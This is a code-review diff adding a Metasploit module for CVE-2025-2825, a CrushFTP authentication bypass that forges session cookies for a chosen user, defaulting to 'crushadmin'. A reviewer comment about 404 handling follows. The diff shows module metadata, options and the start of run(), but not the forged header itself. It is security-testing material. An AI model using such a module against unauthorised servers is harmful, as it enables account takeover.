modules/auxiliary/gather/crushftp_authbypass_cve_2025_2825.rb

```diff
@@ -0,0 +1,119 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'CrushFTP AWS4-HMAC Authentication Bypass',
+        'Description' => %q{
+          This module leverages an authentication bypass in CrushFTP 11 < 11.3.1 and 10 < 10.8.4. Attackers
+          with knowledge of a valid username can provide a crafted S3 authentication header to the CrushFTP web API
+          to authenticate as that user without valid credentials. When successfully executed, the exploit will
+          output working session cookies for the target user account. This vulnerability is tracked as CVE-2025-2825.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'remmons-r7', # MSF Module & Rapid7 Analysis
+        ],
+        'References' => [
+          ['CVE', '2025-2825'],
+          ['URL', 'https://attackerkb.com/topics/k0EgiL9Psz/cve-2025-2825/rapid7-analysis']
+        ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          # The CrushFTP.log file will contain a log of the HTTP requests
+          # Similarly, files in logs/session_logs/ will contain a log of the HTTP requests
+          # The sessions.obj file will temporarily persist details of recent requests
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(8080),
+        OptString.new('TARGETUSER', [true, 'The target account to forge a session cookie for', 'crushadmin']),
+        OptString.new('TARGETURI', [true, 'The URI path to CrushFTP', '/'])
+      ]
+    )
+  end
+
+  def run
+    # Unauthenticated requests to WebInterface endpoints should receive a response containing an 'anonymous' user session cookie
+    print_status('Confirming the target is a CrushFTP web service')
+    res_anonymous = get_anon_session
+
+    fail_with(Failure::Unknown, 'Connection failed - unable to get 404 page response') unless res_anonymous
```

Comment:
Maybe check that the reply is a 404 before saying that the module is unable to get a 404.